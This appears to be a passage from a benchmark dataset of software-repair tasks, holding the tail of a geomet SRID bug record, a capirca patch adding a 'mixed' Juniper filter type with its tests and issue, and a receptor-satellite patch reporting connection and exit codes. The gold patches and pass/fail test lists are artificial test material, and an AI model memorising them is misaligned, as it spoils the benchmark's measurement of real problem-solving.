def _extract_geojson_srid(obj):
...
return srid or 4326
```
This means it will never return the srid value I explicitly define. The workaround is to add the crs field into the `input_geojson`:
```python
input_geojson = {'coordinates': [494252.595744681, 7066045.31914894], 'type': 'Point', 'crs': {'type': 'name', 'properties': {'name': 'EPSG:32632'}}}
```
The simple fix is to change all of the `_extract_geojson_srid(obj) or srid` to `srid or _extract_geojson_srid(obj)`
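A minimal sketch of the precedence problem and the fix described above; `_extract_geojson_srid` below is a simplified stand-in for the real helper, which falls back to 4326:
```python
def _extract_geojson_srid(obj):
    # Simplified stand-in: the real helper parses obj['crs'] and defaults to 4326.
    name = obj.get("crs", {}).get("properties", {}).get("name", "")
    srid = int(name.split(":")[-1]) if name else None
    return srid or 4326

point = {"coordinates": [494252.595744681, 7066045.31914894], "type": "Point"}

# Buggy order: the helper always returns something truthy (4326 by default),
# so the explicitly passed srid is discarded.
srid = _extract_geojson_srid(point) or 32632   # -> 4326

# Fixed order (as in the patch above): only consult the GeoJSON when no
# explicit srid was supplied.
srid = 32632
if srid is None:
    srid = _extract_geojson_srid(point)        # srid stays 32632
```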
|
0.0
|
f4def96884c3c5f36fc9be98bc5e351e4aa5a3a6
|
[
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSONCustomSRID::test_dumps_to_esrijson_multipoint_custom_srid",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSONCustomSRID::test_dumps_to_esrijson_point_custom_srid",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSONCustomSRID::test_dumps_to_esrijson_polygon_custom_srid",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSONCustomSRID::test_dumps_to_esrijson_polyline_custom_srid"
] |
[
"geomet/tests/esri_test.py::TestIOReaderWriter::test_io_dump",
"geomet/tests/esri_test.py::TestIOReaderWriter::test_io_load",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_empty_polygon_to_gj",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_empty_polyline_to_gj",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_empty_pt_to_gj",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_to_empty_mpt_to_gj",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_to_geojson_linstring",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_to_geojson_multipoint",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_to_geojson_point",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_to_geojson_polygon",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_unsupported_geom_type",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_dumps_to_esrijson_multipoint",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_dumps_to_esrijson_point",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_dumps_to_esrijson_polygon1",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_dumps_to_esrijson_polygon2",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_dumps_to_esrijson_polyline1",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_dumps_to_esrijson_polyline2",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_multipolygon_nesting",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_srid_checks"
] |
{
"failed_lite_validators": [
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2023-11-09 00:40:40+00:00
|
apache-2.0
| 2,443
|
|
google__capirca-266
|
diff --git a/capirca/lib/juniper.py b/capirca/lib/juniper.py
index c0a36ad..875f782 100644
--- a/capirca/lib/juniper.py
+++ b/capirca/lib/juniper.py
@@ -163,7 +163,8 @@ class Term(aclgenerator.Term):
'daddr': 'ip-destination-address',
'protocol': 'ip-protocol',
'protocol-except': 'ip-protocol-except',
- 'tcp-est': 'tcp-flags "(ack|rst)"'}}
+ 'tcp-est': 'tcp-flags "(ack|rst)"'}
+ }
def __init__(self, term, term_type, enable_dsmo, noverbose):
super().__init__(term)
@@ -857,7 +858,7 @@ class Juniper(aclgenerator.ACLGenerator):
_PLATFORM = 'juniper'
_DEFAULT_PROTOCOL = 'ip'
- _SUPPORTED_AF = set(('inet', 'inet6', 'bridge'))
+ _SUPPORTED_AF = frozenset(('inet', 'inet6', 'bridge', 'mixed'))
_TERM = Term
SUFFIX = '.jcl'
@@ -942,42 +943,57 @@ class Juniper(aclgenerator.ACLGenerator):
if len(filter_options) > 1:
filter_type = filter_options[1]
- term_names = set()
- new_terms = []
- for term in terms:
+ if filter_type == 'mixed':
+ filter_types_to_process = ['inet', 'inet6']
+ else:
+ filter_types_to_process = [filter_type]
- # if inactive is set, deactivate the term and remove the option.
- if 'inactive' in term.option:
- term.inactive = True
- term.option.remove('inactive')
-
- term.name = self.FixTermLength(term.name)
-
- if term.name in term_names:
- raise JuniperDuplicateTermError('You have multiple terms named: %s' %
- term.name)
- term_names.add(term.name)
-
- term = self.FixHighPorts(term, af=filter_type)
- if not term:
- continue
-
- if term.expiration:
- if term.expiration <= exp_info_date:
- logging.info('INFO: Term %s in policy %s expires '
- 'in less than two weeks.', term.name, filter_name)
- if term.expiration <= current_date:
- logging.warning('WARNING: Term %s in policy %s is expired and '
- 'will not be rendered.', term.name, filter_name)
- continue
- if 'is-fragment' in term.option and filter_type == 'inet6':
- raise JuniperFragmentInV6Error('The term %s uses "is-fragment" but '
- 'is a v6 policy.' % term.name)
+ for filter_type in filter_types_to_process:
+
+ filter_name_suffix = ''
+ # If mixed filter_type, will append 4 or 6 to the filter name
+ if len(filter_types_to_process) > 1:
+ if filter_type == 'inet':
+ filter_name_suffix = '4'
+ if filter_type == 'inet6':
+ filter_name_suffix = '6'
+
+ term_names = set()
+ new_terms = []
+ for term in terms:
- new_terms.append(self._TERM(term, filter_type, enable_dsmo, noverbose))
+ # if inactive is set, deactivate the term and remove the option.
+ if 'inactive' in term.option:
+ term.inactive = True
+ term.option.remove('inactive')
+
+ term.name = self.FixTermLength(term.name)
+
+ if term.name in term_names:
+ raise JuniperDuplicateTermError('You have multiple terms named: %s' %
+ term.name)
+ term_names.add(term.name)
+
+ term = self.FixHighPorts(term, af=filter_type)
+ if not term:
+ continue
- self.juniper_policies.append((header, filter_name, filter_type,
- interface_specific, new_terms))
+ if term.expiration:
+ if term.expiration <= exp_info_date:
+ logging.info('INFO: Term %s in policy %s expires '
+ 'in less than two weeks.', term.name, filter_name)
+ if term.expiration <= current_date:
+ logging.warning('WARNING: Term %s in policy %s is expired and '
+ 'will not be rendered.', term.name, filter_name)
+ continue
+ if 'is-fragment' in term.option and filter_type == 'inet6':
+ raise JuniperFragmentInV6Error('The term %s uses "is-fragment" but '
+ 'is a v6 policy.' % term.name)
+
+ new_terms.append(self._TERM(term, filter_type, enable_dsmo, noverbose))
+
+ self.juniper_policies.append((header, filter_name + filter_name_suffix, filter_type,
+ interface_specific, new_terms))
def __str__(self):
config = Config()
|
google/capirca
|
2b1c3519255fa0940a464521197d80187b355570
|
diff --git a/tests/lib/juniper_test.py b/tests/lib/juniper_test.py
index 2846360..95557c3 100644
--- a/tests/lib/juniper_test.py
+++ b/tests/lib/juniper_test.py
@@ -20,6 +20,7 @@ from absl.testing import absltest
from unittest import mock
from absl import logging
+from absl.testing import parameterized
from capirca.lib import aclgenerator
from capirca.lib import juniper
from capirca.lib import nacaddr
@@ -42,6 +43,11 @@ header {
target:: juniper test-filter inet6
}
"""
+GOOD_HEADER_MIXED = """
+header {
+ target:: juniper test-filter mixed
+}
+"""
GOOD_HEADER_BRIDGE = """
header {
target:: juniper test-filter bridge
@@ -533,6 +539,16 @@ term flex-match-term-1 {
}
"""
+MIXED_TESTING_TERM = """
+term good-term {
+ protocol:: tcp
+ source-address:: SOME_HOST
+ destination-port:: SMTP
+ destination-address:: SOME_OTHER_HOST
+ action:: accept
+}
+"""
+
SUPPORTED_TOKENS = frozenset([
'action',
'address',
@@ -645,7 +661,7 @@ SUPPORTED_SUB_TOKENS = {
EXP_INFO = 2
-class JuniperTest(absltest.TestCase):
+class JuniperTest(parameterized.TestCase):
def setUp(self):
super().setUp()
@@ -1533,6 +1549,136 @@ class JuniperTest(absltest.TestCase):
GOOD_HEADER_V6 + BAD_FLEX_MATCH_TERM_4,
self.naming)
+ @parameterized.named_parameters(
+ ('MIXED_TO_V4',
+ [[nacaddr.IPv4('0.0.0.0/1'),
+ nacaddr.IPv6('2001::/33')], [nacaddr.IPv4('192.168.0.0/24')]], [
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 0.0.0.0/1;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 192.168.0.0/24;\n' +
+ ' }'
+ ], ['2001::/33']),
+ ('V4_TO_MIXED', [
+ [nacaddr.IPv4('192.168.0.0/24')],
+ [nacaddr.IPv4('0.0.0.0/1'),
+ nacaddr.IPv6('2001::/33')],
+ ], [
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 192.168.0.0/24;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 0.0.0.0/1;\n' +
+ ' }'
+ ], ['2001::/33']),
+ ('MIXED_TO_V6',
+ [[nacaddr.IPv4('0.0.0.0/1'),
+ nacaddr.IPv6('2001::/33')], [nacaddr.IPv6('2201::/48')]], [
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 2001::/33;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 2201::/48;\n' +
+ ' }'
+ ], ['0.0.0.0/1']),
+ ('V6_TO_MIXED', [[
+ nacaddr.IPv6('2201::/48')
+ ], [nacaddr.IPv4('0.0.0.0/1'),
+ nacaddr.IPv6('2001::/33')]], [
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 2201::/48;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 2001::/33;\n' +
+ ' }'
+ ], ['0.0.0.0/1']),
+ ('MIXED_TO_MIXED', [[
+ nacaddr.IPv4('0.0.0.0/1'),
+ nacaddr.IPv6('2001::/33')
+ ], [nacaddr.IPv4('192.168.0.0/24'),
+ nacaddr.IPv6('2201::/48')]], [
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 0.0.0.0/1;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 192.168.0.0/24;\n' +
+ ' }',
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 2001::/33;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 2201::/48;\n' +
+ ' }'
+ ], []),
+ ('V4_TO_V4', [[nacaddr.IPv4('0.0.0.0/1')],
+ [nacaddr.IPv4('192.168.0.0/24')]], [
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 0.0.0.0/1;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 192.168.0.0/24;\n' +
+ ' }'
+ ], []),
+ ('V6_TO_V6', [[nacaddr.IPv6('2001::/33')], [nacaddr.IPv6('2201::/48')]], [
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 2001::/33;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 2201::/48;\n' +
+ ' }'
+ ], []),
+ (
+ 'V4_TO_V6',
+ [[nacaddr.IPv4('0.0.0.0/1')], [nacaddr.IPv6('2201::/48')]],
+ [],
+ ['0.0.0.0/1', '192.168.0.0/24', '2001::/33', '2201::/48'],
+ ),
+ (
+ 'V6_TO_V4',
+ [[nacaddr.IPv6('2001::/33')], [nacaddr.IPv4('192.168.0.0/24')]],
+ [],
+ ['0.0.0.0/1', '192.168.0.0/24', '2001::/33', '2201::/48'],
+ ),
+ (
+ 'PARTLY_UNSPECIFIED',
+ [[nacaddr.IPv6('2001::/33')], [nacaddr.IPv4('192.168.0.0/24')]],
+ ['term good_term_25 '],
+ [
+ '0.0.0.0/1', '192.168.0.0/24', '2001::/33', '2201::/48',
+ 'term good-term-both-icmp-and-icmpv6-'
+ ],
+ ),
+ )
+ def testMixed(self, addresses, expected, notexpected):
+ self.naming.GetNetAddr.side_effect = addresses
+ self.naming.GetServiceByProto.return_value = ['25']
+ jcl = juniper.Juniper(
+ policy.ParsePolicy(
+ GOOD_HEADER_MIXED + MIXED_TESTING_TERM + GOOD_TERM_25, self.naming),
+ EXP_INFO)
+ output = str(jcl)
+ for expect in expected:
+ self.assertIn(expect, output, output)
+ for notexpect in notexpected:
+ self.assertNotIn(notexpect, output, output)
+
if __name__ == '__main__':
absltest.main()
|
Support multiple targets per header
Based on https://github.com/google/capirca/wiki/Policy-format#header-section I was under the impression that a header could have multiple targets, for example:
```
header {
target:: juniper testpol4 inet
target:: juniper testpol6 inet6
}
term default {
comment:: "test"
action:: deny
}
```
But running that only outputs:
```
firewall {
family inet {
/*
** $Id:$
** $Date:$
** $Revision:$
**
*/
replace: filter testpol4 {
interface-specific;
/*
** test
*/
term default {
then {
discard;
}
}
}
}
}
```
While I would have expected both inet and inet6 filters to be generated.
I'm wondering if it's a regression, a bug, or something that was just never supported, but it would be nice to keep policy files as lean as possible.
The workaround is to do:
```
header {
target:: juniper testpol4 inet
}
#include 'testpol.inc'
header {
target:: juniper testpol6 inet6
}
#include 'testpol.inc'
```
Which is more complex and creates clutter.
What do you think?
Thanks.
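For reference, the patch above takes a slightly different route: instead of multiple targets per header, it adds a `mixed` filter type that expands into both address families and appends `4` and `6` to the filter name. With that change, a policy like the following (names are illustrative) renders both a `testpol4` and a `testpol6` filter:
```
header {
  target:: juniper testpol mixed
}
term default {
  comment:: "test"
  action:: deny
}
```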
|
0.0
|
2b1c3519255fa0940a464521197d80187b355570
|
[
"tests/lib/juniper_test.py::JuniperTest::testMixedMIXED_TO_MIXED",
"tests/lib/juniper_test.py::JuniperTest::testMixedMIXED_TO_V4",
"tests/lib/juniper_test.py::JuniperTest::testMixedMIXED_TO_V6",
"tests/lib/juniper_test.py::JuniperTest::testMixedPARTLY_UNSPECIFIED",
"tests/lib/juniper_test.py::JuniperTest::testMixedV4_TO_MIXED",
"tests/lib/juniper_test.py::JuniperTest::testMixedV4_TO_V4",
"tests/lib/juniper_test.py::JuniperTest::testMixedV4_TO_V6",
"tests/lib/juniper_test.py::JuniperTest::testMixedV6_TO_MIXED",
"tests/lib/juniper_test.py::JuniperTest::testMixedV6_TO_V4",
"tests/lib/juniper_test.py::JuniperTest::testMixedV6_TO_V6"
] |
[
"tests/lib/juniper_test.py::JuniperTest::testAddressExclude",
"tests/lib/juniper_test.py::JuniperTest::testArbitraryOptions",
"tests/lib/juniper_test.py::JuniperTest::testBadFilterType",
"tests/lib/juniper_test.py::JuniperTest::testBridgeFilterInetType",
"tests/lib/juniper_test.py::JuniperTest::testBridgeFilterType",
"tests/lib/juniper_test.py::JuniperTest::testBuildTokens",
"tests/lib/juniper_test.py::JuniperTest::testBuildWarningTokens",
"tests/lib/juniper_test.py::JuniperTest::testCommentShrinking",
"tests/lib/juniper_test.py::JuniperTest::testConfigHelper",
"tests/lib/juniper_test.py::JuniperTest::testDefaultDeny",
"tests/lib/juniper_test.py::JuniperTest::testDscpByte",
"tests/lib/juniper_test.py::JuniperTest::testDscpClass",
"tests/lib/juniper_test.py::JuniperTest::testDscpIPv6",
"tests/lib/juniper_test.py::JuniperTest::testDsmo",
"tests/lib/juniper_test.py::JuniperTest::testDsmoExclude",
"tests/lib/juniper_test.py::JuniperTest::testDsmoJuniperFriendly",
"tests/lib/juniper_test.py::JuniperTest::testEncapsulate",
"tests/lib/juniper_test.py::JuniperTest::testEtherType",
"tests/lib/juniper_test.py::JuniperTest::testExpiredTerm",
"tests/lib/juniper_test.py::JuniperTest::testExpiringTerm",
"tests/lib/juniper_test.py::JuniperTest::testFailEncapsulate",
"tests/lib/juniper_test.py::JuniperTest::testFailFlexibleMatch",
"tests/lib/juniper_test.py::JuniperTest::testFailIsFragmentInV6",
"tests/lib/juniper_test.py::JuniperTest::testFailNextIpMultipleIP",
"tests/lib/juniper_test.py::JuniperTest::testFailNextIpNetworkIP",
"tests/lib/juniper_test.py::JuniperTest::testFlexibleMatch",
"tests/lib/juniper_test.py::JuniperTest::testFlexibleMatchIPv6",
"tests/lib/juniper_test.py::JuniperTest::testForwardingClass",
"tests/lib/juniper_test.py::JuniperTest::testForwardingClassExcept",
"tests/lib/juniper_test.py::JuniperTest::testFragmentOffset",
"tests/lib/juniper_test.py::JuniperTest::testHopLimit",
"tests/lib/juniper_test.py::JuniperTest::testHopLimitInet",
"tests/lib/juniper_test.py::JuniperTest::testHopOptProtocol",
"tests/lib/juniper_test.py::JuniperTest::testIcmpCode",
"tests/lib/juniper_test.py::JuniperTest::testIcmpInet6Mismatch",
"tests/lib/juniper_test.py::JuniperTest::testIcmpType",
"tests/lib/juniper_test.py::JuniperTest::testIcmpv6Except",
"tests/lib/juniper_test.py::JuniperTest::testIcmpv6InetMismatch",
"tests/lib/juniper_test.py::JuniperTest::testInactiveTerm",
"tests/lib/juniper_test.py::JuniperTest::testInet6",
"tests/lib/juniper_test.py::JuniperTest::testInterfaceSpecificHeader",
"tests/lib/juniper_test.py::JuniperTest::testLongPolicer",
"tests/lib/juniper_test.py::JuniperTest::testLossPriority",
"tests/lib/juniper_test.py::JuniperTest::testMinimizePrefixes",
"tests/lib/juniper_test.py::JuniperTest::testMultipleForwardingClass",
"tests/lib/juniper_test.py::JuniperTest::testMultipleForwardingClassExcept",
"tests/lib/juniper_test.py::JuniperTest::testMultiplePrecedence",
"tests/lib/juniper_test.py::JuniperTest::testNextIp",
"tests/lib/juniper_test.py::JuniperTest::testNextIpFormat",
"tests/lib/juniper_test.py::JuniperTest::testNextIpv6",
"tests/lib/juniper_test.py::JuniperTest::testNoMatchReversal",
"tests/lib/juniper_test.py::JuniperTest::testNoVerboseV4",
"tests/lib/juniper_test.py::JuniperTest::testNoVerboseV6",
"tests/lib/juniper_test.py::JuniperTest::testNonTcpWithTcpEstablished",
"tests/lib/juniper_test.py::JuniperTest::testNotInterfaceSpecificHeader",
"tests/lib/juniper_test.py::JuniperTest::testOptions",
"tests/lib/juniper_test.py::JuniperTest::testOwnerTerm",
"tests/lib/juniper_test.py::JuniperTest::testPrecedence",
"tests/lib/juniper_test.py::JuniperTest::testPrefixList",
"tests/lib/juniper_test.py::JuniperTest::testPrefixListExcept",
"tests/lib/juniper_test.py::JuniperTest::testPrefixListMixed",
"tests/lib/juniper_test.py::JuniperTest::testProtocolCase",
"tests/lib/juniper_test.py::JuniperTest::testProtocolExcept",
"tests/lib/juniper_test.py::JuniperTest::testRoutingInstance",
"tests/lib/juniper_test.py::JuniperTest::testSimplifiedThenStatement",
"tests/lib/juniper_test.py::JuniperTest::testSimplifiedThenStatementWithSingleAction",
"tests/lib/juniper_test.py::JuniperTest::testSimplifiedThenStatementWithSingleActionDiscardIPv4",
"tests/lib/juniper_test.py::JuniperTest::testSimplifiedThenStatementWithSingleActionDiscardIPv6",
"tests/lib/juniper_test.py::JuniperTest::testSimplifiedThenStatementWithSingleActionRejectIPv6",
"tests/lib/juniper_test.py::JuniperTest::testTTL",
"tests/lib/juniper_test.py::JuniperTest::testTTLInet6",
"tests/lib/juniper_test.py::JuniperTest::testTcpEstablished",
"tests/lib/juniper_test.py::JuniperTest::testTermAndFilterName",
"tests/lib/juniper_test.py::JuniperTest::testTermTypeIndexKeys",
"tests/lib/juniper_test.py::JuniperTest::testTrafficClassCount",
"tests/lib/juniper_test.py::JuniperTest::testTrafficType",
"tests/lib/juniper_test.py::JuniperTest::testVerbatimTerm"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2021-04-21 13:15:37+00:00
|
apache-2.0
| 2,564
|
|
project-receptor__receptor-satellite-5
|
diff --git a/receptor_satellite/response/messages.py b/receptor_satellite/response/messages.py
index 23ee860..b16de05 100644
--- a/receptor_satellite/response/messages.py
+++ b/receptor_satellite/response/messages.py
@@ -30,12 +30,21 @@ def playbook_run_cancel_ack(playbook_run_id, status):
}
-def playbook_run_finished(host, playbook_run_id, result=RESULT_SUCCESS):
+def playbook_run_finished(
+ host,
+ playbook_run_id,
+ result=RESULT_SUCCESS,
+ connection_error=False,
+ execution_code=0,
+):
return {
+ "version": 2,
"type": "playbook_run_finished",
"playbook_run_id": playbook_run_id,
"host": host,
"status": result,
+ "connection_code": 1 if connection_error else 0,
+ "execution_code": None if connection_error else execution_code,
}
diff --git a/receptor_satellite/response/response_queue.py b/receptor_satellite/response/response_queue.py
index 4cf0f45..dc5dab0 100644
--- a/receptor_satellite/response/response_queue.py
+++ b/receptor_satellite/response/response_queue.py
@@ -15,9 +15,18 @@ class ResponseQueue:
)
def playbook_run_finished(
- self, host, playbook_run_id, result=constants.RESULT_SUCCESS
+ self,
+ host,
+ playbook_run_id,
+ result=constants.RESULT_SUCCESS,
+ connection_error=False,
+ exit_code=0,
):
- self.queue.put(messages.playbook_run_finished(host, playbook_run_id, result))
+ self.queue.put(
+ messages.playbook_run_finished(
+ host, playbook_run_id, result, connection_error, exit_code
+ )
+ )
def playbook_run_completed(
self, playbook_run_id, status, connection_error=None, infrastructure_error=None
diff --git a/receptor_satellite/worker.py b/receptor_satellite/worker.py
index e16b45b..5140766 100644
--- a/receptor_satellite/worker.py
+++ b/receptor_satellite/worker.py
@@ -9,7 +9,8 @@ import receptor_satellite.response.constants as constants
from .run_monitor import run_monitor
# EXCEPTION means failure between capsule and the target host
-EXIT_STATUS_RE = re.compile(r"Exit status: ([0-9]+|EXCEPTION)", re.MULTILINE)
+EXIT_STATUS_RE = re.compile(r"Exit status: (([0-9]+)|EXCEPTION)", re.MULTILINE)
+UNREACHABLE_RE = re.compile(r"unreachable=[1-9][0-9]*")
def receptor_export(func):
@@ -93,6 +94,8 @@ class Host:
self.sequence = 0
self.since = None if run.config.text_update_full else 0.0
self.result = None
+ self.last_recap_line = ""
+ self.host_recap_re = re.compile(f"^.*{name}.*ok=[0-9]+")
def mark_as_failed(self, message):
queue = self.run.queue
@@ -119,16 +122,32 @@ class Host:
self.name, self.run.playbook_run_id, last_output, self.sequence
)
self.sequence += 1
+
+ possible_recaps = list(
+ filter(
+ lambda x: re.match(self.host_recap_re, x), last_output.split("\n")
+ )
+ )
+ if len(possible_recaps) > 0:
+ self.last_recap_line = possible_recaps.pop()
+
if body["complete"]:
+ connection_error = re.search(UNREACHABLE_RE, self.last_recap_line)
result = constants.HOST_RESULT_FAILURE
matches = re.findall(EXIT_STATUS_RE, last_output)
+ exit_code = None
# This means the job was already running on the host
if matches:
- # If exitcode is 0
- if matches[0] == "0":
- result = constants.HOST_RESULT_SUCCESS
- elif self.run.cancelled:
- result = constants.HOST_RESULT_CANCEL
+ code = matches[0][1]
+ # If there was an exit code
+ if code != "":
+ exit_code = int(code)
+ if exit_code == 0:
+ result = constants.HOST_RESULT_SUCCESS
+ elif self.run.cancelled:
+ result = constants.HOST_RESULT_CANCEL
+ else:
+ result = constants.HOST_RESULT_FAILURE
elif self.run.cancelled:
result = constants.HOST_RESULT_CANCEL
else:
@@ -139,6 +158,8 @@ class Host:
constants.HOST_RESULT_FAILURE
if result == constants.HOST_RESULT_INFRA_FAILURE
else result,
+ connection_error or result == constants.HOST_RESULT_INFRA_FAILURE,
+ exit_code,
)
self.result = result
break
diff --git a/setup.cfg b/setup.cfg
index 849e449..3c1f6ae 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -21,6 +21,7 @@ ignore=E201,E203,E221,E225,E231,E241,E251,E261,E265,E303,W291,W391,W293,E731,F40
exclude=.tox,venv,awx/lib/site-packages,awx/plugins/inventory,awx/ui,awx/api/urls.py,awx/main/migrations,awx/main/south_migrations,awx/main/tests/data,node_modules/,awx/projects/,tools/docker,awx/settings/local_*.py,installer/openshift/settings.py,build/,installer/
per-file-ignores =
tests/constants.py:E501
+ tests/test_run.py:E501
[metadata]
license_file=LICENSE.md
|
project-receptor/receptor-satellite
|
9c636515c06c01246641abbf4e786888d050fa9b
|
diff --git a/tests/test_response_queue.py b/tests/test_response_queue.py
index 170a8dc..d53ddef 100644
--- a/tests/test_response_queue.py
+++ b/tests/test_response_queue.py
@@ -13,7 +13,10 @@ PLAYBOOK_RUN_COMPLETED_TEST_CASES = [
),
(
("some-uuid", constants.RESULT_FAILURE, None, None),
- messages.playbook_run_completed("some-uuid", constants.RESULT_FAILURE,),
+ messages.playbook_run_completed(
+ "some-uuid",
+ constants.RESULT_FAILURE,
+ ),
),
(
("some-uuid", constants.RESULT_CANCEL, None, None),
diff --git a/tests/test_run.py b/tests/test_run.py
index 329fcb1..cfa658b 100644
--- a/tests/test_run.py
+++ b/tests/test_run.py
@@ -125,7 +125,11 @@ def poll_with_retries_scenario(request, base_scenario):
@pytest.mark.asyncio
async def test_poll_with_retries(poll_with_retries_scenario):
- (queue, host, param,) = poll_with_retries_scenario
+ (
+ queue,
+ host,
+ param,
+ ) = poll_with_retries_scenario
satellite_api = host.run.satellite_api
satellite_api.responses = [
param.api_output for _x in range(len(param.api_requests))
@@ -211,7 +215,7 @@ POLLING_LOOP_TEST_CASES = [
queue_messages=[
messages.playbook_run_update("host1", "play_id", "Exit status: 123", 0),
messages.playbook_run_finished(
- "host1", "play_id", constants.RESULT_FAILURE
+ "host1", "play_id", constants.RESULT_FAILURE, False, 123
),
],
),
@@ -226,7 +230,9 @@ POLLING_LOOP_TEST_CASES = [
api_requests=[("output", (None, 1, None))],
queue_messages=[
messages.playbook_run_update("host1", "play_id", "Exit status: 123", 0),
- messages.playbook_run_finished("host1", "play_id", constants.RESULT_CANCEL),
+ messages.playbook_run_finished(
+ "host1", "play_id", constants.RESULT_CANCEL, False, 123
+ ),
],
),
]
@@ -243,7 +249,11 @@ def polling_loop_scenario(request, base_scenario):
@pytest.mark.asyncio
async def test_polling_loop(polling_loop_scenario):
- (queue, host, param,) = polling_loop_scenario
+ (
+ queue,
+ host,
+ param,
+ ) = polling_loop_scenario
satellite_api = host.run.satellite_api
satellite_api.responses = [
param.api_output for _x in range(len(param.api_requests))
@@ -331,7 +341,10 @@ START_TEST_CASES = [
messages.playbook_run_finished(
"host1", "play_id", constants.RESULT_SUCCESS
),
- messages.playbook_run_completed("play_id", constants.RESULT_SUCCESS,),
+ messages.playbook_run_completed(
+ "play_id",
+ constants.RESULT_SUCCESS,
+ ),
],
FakeLogger()
.info("Playbook run play_id running as job invocation 123")
@@ -369,7 +382,7 @@ START_TEST_CASES = [
0,
),
messages.playbook_run_finished(
- "host1", "play_id", constants.HOST_RESULT_FAILURE
+ "host1", "play_id", constants.HOST_RESULT_FAILURE, True
),
messages.playbook_run_completed(
"play_id",
@@ -390,16 +403,53 @@ START_TEST_CASES = [
error=None,
),
dict(
+ error=None,
body={
+ "complete": True,
"output": [
{
- "output": "Error initializing command: Net::SSH::AuthenticationFailed - Authentication failed for user root@centos-katello-3.14-0.example.com\n" # noqa: E501
+ "output": "\u001b[0;34mUsing /etc/ansible/ansible.cfg as config file\u001b[0m\n",
+ "output_type": "stdout",
+ "timestamp": 1600350676.69755,
+ },
+ {
+ "output": "\n",
+ "output_type": "stdout",
+ "timestamp": 1600350677.70155,
+ },
+ {
+ "output": "\r\nPLAY [all] *********************************************************************\n",
+ "output_type": "stdout",
+ "timestamp": 1600350677.70175,
+ },
+ {
+ "output": "\r\nTASK [Gathering Facts] *********************************************************\n",
+ "output_type": "stdout",
+ "timestamp": 1600350677.70195,
+ },
+ {
+ "output": "\n",
+ "output_type": "stdout",
+ "timestamp": 1600350677.70212,
+ },
+ {
+ "output": '\u001b[1;31mfatal: [host1]: UNREACHABLE! => {"changed": false, "msg": "Invalid/incorrect password: Permission denied, please try again.\\r\\nPermission denied, please try again.\\r\\nReceived disconnect from 10.110.156.47 port 22:2: Too many authentication failures\\r\\nDisconnected from 10.110.156.47 port 22", "unreachable": true}\u001b[0m\n',
+ "output_type": "stdout",
+ "timestamp": 1600350684.0395,
+ },
+ {
+ "output": "PLAY RECAP *********************************************************************\n\u001b[0;31mhost1\u001b[0m : ok=0 changed=0 \u001b[1;31munreachable=1 \u001b[0m failed=0 skipped=0 rescued=0 ignored=0 ",
+ "output_type": "stdout",
+ "timestamp": 1600350687.1491,
+ },
+ {
+ "output": "Exit status: 1",
+ "output_type": "stdout",
+ "timestamp": 1600350688.1491,
},
- {"output": "Exit status: EXCEPTION"},
],
- "complete": True,
+ "refresh": False,
},
- error=None,
),
],
[
@@ -411,13 +461,16 @@ START_TEST_CASES = [
messages.playbook_run_update(
"host1",
"play_id",
- "Error initializing command: Net::SSH::AuthenticationFailed - Authentication failed for user root@centos-katello-3.14-0.example.com\nExit status: EXCEPTION", # noqa: E501
+ '\x1b[0;34mUsing /etc/ansible/ansible.cfg as config file\x1b[0m\n\n\r\nPLAY [all] *********************************************************************\n\r\nTASK [Gathering Facts] *********************************************************\n\n\x1b[1;31mfatal: [host1]: UNREACHABLE! => {"changed": false, "msg": "Invalid/incorrect password: Permission denied, please try again.\\r\\nPermission denied, please try again.\\r\\nReceived disconnect from 10.110.156.47 port 22:2: Too many authentication failures\\r\\nDisconnected from 10.110.156.47 port 22", "unreachable": true}\x1b[0m\nPLAY RECAP *********************************************************************\n\x1b[0;31mhost1\x1b[0m : ok=0 changed=0 \x1b[1;31munreachable=1 \x1b[0m failed=0 skipped=0 rescued=0 ignored=0 Exit status: 1',
0,
),
messages.playbook_run_finished(
- "host1", "play_id", constants.HOST_RESULT_FAILURE
+ "host1", "play_id", constants.HOST_RESULT_FAILURE, True
